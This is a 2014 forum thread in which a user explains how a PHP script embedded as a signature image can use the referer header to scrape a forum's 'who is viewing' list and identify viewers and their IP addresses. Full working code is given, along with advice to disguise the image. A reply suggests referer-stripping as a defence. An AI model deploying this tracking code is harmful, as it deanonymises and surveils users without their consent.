The Sanctuary

Technology => Network (in)Security => Topic started by: burroughs on November 17, 2014, 01:47:28 am

Title: Why you should hide your online status on forums
Post by: burroughs on November 17, 2014, 01:47:28 am

NOTE: Refresh this page once it loads for this first time to get the full effect. The referer is not set to this thread when clicking into it elsewhere.

This is a rehash of a post I made on &T2 awhile back.

(http://bursylursy.webatu.com/tracking.php)

What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:

Embed a script on a forum signature that outputs an image.
When a user loads this image, the http referer header will be the previous page they came from.
Using this referer value, we can make an http request back to the same page and parse the HTML looking for the "... is viewing this topic"
Even if there are multiple people viewing, we can make a guess at an IP address if we log enough requests through a process of elimination. We can also track their viewing habits over time.
We can disguise our image with some nice pr0n instead of politely informing a user that we know who they are.

Things we learned

You should always hide your online status on forums.
It's a bad idea to allow users to reference external resources, especially in areas with a lot of exposure like signatures.

Code

Code: [Select]

[img]http://bursylursy.webatu.com/tracking.php[/img]

Code: [Select]

<?php
header("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip =  $_SERVER["REMOTE_ADDR"];
$ref = $_SERVER["HTTP_REFERER"];
$displayusers = "";

if (strlen($ref) > 0) {
	header("Content-type: image/png");
	$response = file_get_contents($ref);
	$doc = new DOMDocument();
	$doc->loadHTML($response);
	$users = $doc->getElementById("whoisviewing")->nodeValue;

	if (strpos($users, "Members") === false) {
		$displayusers = "You are probably one of these users: " . substr($users, 0, strpos($users, " and"));
	}

	$im = imagecreate(900, 70);
	$bg = imagecolorallocate($im, 255, 255, 255);
	$textcolor = imagecolorallocate($im, 0, 0, 255);

	imagestring($im, 5, 5, 5, "Your ip address is: " . $ip, $textcolor);
	imagestring($im, 5, 5, 25, "You are viewing this page: " . $ref, $textcolor);
	imagestring($im, 5, 5, 45, $displayusers, $textcolor);
	
	imagepng($im);
	imagedestroy($im);
} else {
	header("Content-type: image/jpeg");
	$im = imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
	imagejpeg($im);
	imagedestroy($im);
}
?>

Title: Re: Why you should hide your online status on forums
Post by: BallsDeep69 on November 17, 2014, 02:06:29 am

*gasp*

Title: Re: Why you should hide your online status on forums
Post by: stdio.h on November 17, 2014, 02:17:32 am

I highly recommend using the JonDoFox (https://anonymous-proxy-servers.net/en/jondofox.html) Firefox profile. In addition to having NoScript enabled by default, it hides the referer when switching domains, preventing this type of attack.